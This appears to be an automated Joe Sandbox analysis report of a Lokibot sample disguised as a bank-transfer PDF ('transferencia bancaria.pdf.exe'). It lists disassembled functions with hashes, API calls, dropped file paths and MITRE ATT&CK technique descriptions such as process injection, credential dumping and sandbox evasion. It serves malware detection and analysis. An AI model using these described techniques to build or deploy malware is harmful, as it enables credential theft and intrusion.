Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 316f5584bc0a15c2db7e00265af0f1628d90990c6ba3f401e10eee1d860955f9
Instruction ID: 2233120b0c59f417ecda42c368e7bcc91a4f44199206531b4ab849c3e66a541e
Opcode Fuzzy Hash: 316f5584bc0a15c2db7e00265af0f1628d90990c6ba3f401e10eee1d860955f9
Instruction Fuzzy Hash: 7D1100B69046098FCB10CFAAC484BDEFBF4EB88320F05842EE519B7200C375A955CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 031AA268 Relevance: 1.6, APIs: 1, Instructions: 52
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,031AA0C9,00000800,00000000,00000000), ref: 031AA2DA

Memory Dump Source

Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fc78a907a7b1b47a5ef488c3f3d1119fa8838bb3bdf2be4a8c864340e1deb12d
Instruction ID: 870825ece008c271c148440cb7adad6c2b4ed808bf44672ec6584d8f60cdd7da
Opcode Fuzzy Hash: fc78a907a7b1b47a5ef488c3f3d1119fa8838bb3bdf2be4a8c864340e1deb12d
Instruction Fuzzy Hash: E41103B6D002498FDB10CF9AD484ADEFBF4AB88314F04845ED819B7600C375A959CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 031A9FE8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 031AA04E

Memory Dump Source

Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 48a61701ab8aed34e4ba74e70437b976179149a3cc52685b29a96fbdfa8d3ae3
Instruction ID: 635c64a91ae933f8e86676fb555c2bf3985eb2c5a91ec260698436c224b95015
Opcode Fuzzy Hash: 48a61701ab8aed34e4ba74e70437b976179149a3cc52685b29a96fbdfa8d3ae3
Instruction Fuzzy Hash: D411DFB6C006498FCB10CF9AC544BDEFBF4AF88224F15841AD429B7600D379A546CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0306D1FC Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.277369160.000000000306D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0306D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_306d000_transferencia bancaria.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21e5e9ea0d704d7fcc10d932013f651b3cacd398593b2ff2d5756cbda496b1a3
Instruction ID: 87adf02bcef4b026e440071ffa256a52e77794ba2346c3a47096280a9e67b83d
Opcode Fuzzy Hash: 21e5e9ea0d704d7fcc10d932013f651b3cacd398593b2ff2d5756cbda496b1a3
Instruction Fuzzy Hash: 77213AB1604241DFDF05DF10D8C4F2ABBA5FB98314F24C5A9ED064B20AC336D856CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0307D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.277423429.000000000307D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0307D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_307d000_transferencia bancaria.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6994197086086c17a8e68b71f8dd0401de19fbe70612b74bf455bf54f5ce594
Instruction ID: c8580d32b90f69fc3b1cebee8eb248984847e5bf4c9332c92720baf830e6a618
Opcode Fuzzy Hash: a6994197086086c17a8e68b71f8dd0401de19fbe70612b74bf455bf54f5ce594
Instruction Fuzzy Hash: 9E210775A04244EFDB05DF10D9C0B26BBA5FF84314F24C9ADE9094B246C336D847CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0307D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.277423429.000000000307D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0307D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_307d000_transferencia bancaria.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8968000e6a0d0fdbcf373d6a0eb466a27d47798979dcc17107c98477ad452c0e
Instruction ID: ee704c95e28f878ca8f9aca81f2d31c99f89455779bab4bdd41be42cbedf0c3b
Opcode Fuzzy Hash: 8968000e6a0d0fdbcf373d6a0eb466a27d47798979dcc17107c98477ad452c0e
Instruction Fuzzy Hash: CD210775A04244DFDB14DF10D9C4B26BBA5FF84314F24C9ADD9094B246C33AD847CAE2

Uniqueness

Uniqueness Score: -1.00%

Function 0307D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.277423429.000000000307D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0307D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_307d000_transferencia bancaria.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12e4e74479fbbde4ba5b81e36311d962de63eda1d054b1b7ad3786d54bd39092
Instruction ID: a453508f714572aaaa93bdff6e45fa8dc71aade053b21fdc8d4df85bf209b827
Opcode Fuzzy Hash: 12e4e74479fbbde4ba5b81e36311d962de63eda1d054b1b7ad3786d54bd39092
Instruction Fuzzy Hash: C32162755093808FCB12CF24D994B15BFB1EF46214F28C5DAD8498B657C33AD85ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0306D1F7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.277369160.000000000306D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0306D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_306d000_transferencia bancaria.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 738f38a92942b39438876c6a1553cd0bccb815d4d18169b4d3f22ead1c19c600
Instruction ID: 09e12f16639bc9d826a8a46d9aa6e816ae7f9d6bd73f6d72f84f6c1ddb7333ed
Opcode Fuzzy Hash: 738f38a92942b39438876c6a1553cd0bccb815d4d18169b4d3f22ead1c19c600
Instruction Fuzzy Hash: 8921AF76504281DFCB16CF10D9C4B56BFB2FB88314F28C6AADC050B65AC33AD466CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0307D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.277423429.000000000307D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0307D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_307d000_transferencia bancaria.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d58ca62981777cd3cbf56bb22269b8e21f4586939eb6954d17036f4794f2a560
Instruction ID: 82efccde932e3857c5941a4e3a7ccda82ede1b0450c4bd720ec0a6f02d633744
Opcode Fuzzy Hash: d58ca62981777cd3cbf56bb22269b8e21f4586939eb6954d17036f4794f2a560
Instruction Fuzzy Hash: 9E117675904280DFCB52CF10D5C4B15BBA1FB88224F28C6AAD8494B656C33AD85BCBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0306D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.277369160.000000000306D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0306D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_306d000_transferencia bancaria.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec61335b488afc360c978185d5152d3224cbc0af43cce3f1df3eff1f0f4474bd
Instruction ID: 05db5937823ea924a6b893e085f0076e378b98333675bb1169eaf373a82a58db
Opcode Fuzzy Hash: ec61335b488afc360c978185d5152d3224cbc0af43cce3f1df3eff1f0f4474bd
Instruction Fuzzy Hash: 2801F7716093809AE710CE26CCC4B6BFBD8EF45274F0C855AE9045B24AE3799840CAB3

Uniqueness

Uniqueness Score: -1.00%

Function 0306D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.277369160.000000000306D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0306D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_306d000_transferencia bancaria.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eae4b98c44b7d4a1ab09533dd3ed1251d8197860a182be7c155eee703c2e859
Instruction ID: c5492be605fc989df4426dbc8cfbc6d03f93553039a10e6868ea8fe046f6732c
Opcode Fuzzy Hash: 5eae4b98c44b7d4a1ab09533dd3ed1251d8197860a182be7c155eee703c2e859
Instruction Fuzzy Hash: 54F0C2715093849AEB508E16CCC8B67FBE8EB41234F1CC45AED081B28AD3789844CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 031AEFD8 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cfa17c49f5bef14552192e199ccbcdc3338d3e677adc85f9d5596713a9f0dc6
Instruction ID: 0a0d70e19c487e402900f47e36d3a175ac91b54f0b1dbe8202f9d11404c4338e
Opcode Fuzzy Hash: 5cfa17c49f5bef14552192e199ccbcdc3338d3e677adc85f9d5596713a9f0dc6
Instruction Fuzzy Hash: 0312FBF14217468BD318EF57E8886897F63B74A328F906308D1611BAD9D7B4B1CACF64

Uniqueness

Uniqueness Score: -1.00%

Function 031AC5F4 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36049b43dcdf85cd24b4351ebeee96a61c6b51ed8b72818776a21e0f1865e075
Instruction ID: d0a79fdf8e789f8ba10306136b0c3993351b466c5c278666db25db8d1af63f4f
Opcode Fuzzy Hash: 36049b43dcdf85cd24b4351ebeee96a61c6b51ed8b72818776a21e0f1865e075
Instruction Fuzzy Hash: 82A15E3AE00619CFCF05DFA9C8845DDBBB2FF89301B15856AE905BB261DB31A945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 031AEFC8 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbc1bc7324844476e46b5797c8798c3a7c4e9f1b306ea7592fef67dd43eabd64
Instruction ID: a6c13f4e8d442c062513442e60d0f6ca99dc7c8007fb1843bcb1125453201fed
Opcode Fuzzy Hash: cbc1bc7324844476e46b5797c8798c3a7c4e9f1b306ea7592fef67dd43eabd64
Instruction Fuzzy Hash: A3C13BB14217458BD718EF67E8885897F73BB9A328F505308D1612BAD8D7B470CACFA4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report transferencia bancaria.pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\transferencia bancaria.pdf.exe.log

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\21c8026919fd094ab07ec3c180a9f210_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
transferencia bancaria.pdf.exe

Function 031A6CD0 Relevance: 1.5, Strings: 1, Instructions: 286
COMMON

Function 031AC0E1 Relevance: 6.1, APIs: 4, Instructions: 125
threadCOMMON

Function 031AC0F0 Relevance: 6.1, APIs: 4, Instructions: 120
threadCOMMON

Function 031A9E08 Relevance: 1.7, APIs: 1, Instructions: 195
COMMON

Function 031A565D Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Function 031A4198 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 031AC718 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Function 031AC720 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Function 031A9188 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Function 031AA268 Relevance: 1.6, APIs: 1, Instructions: 52
libraryCOMMON

Function 031A9FE8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON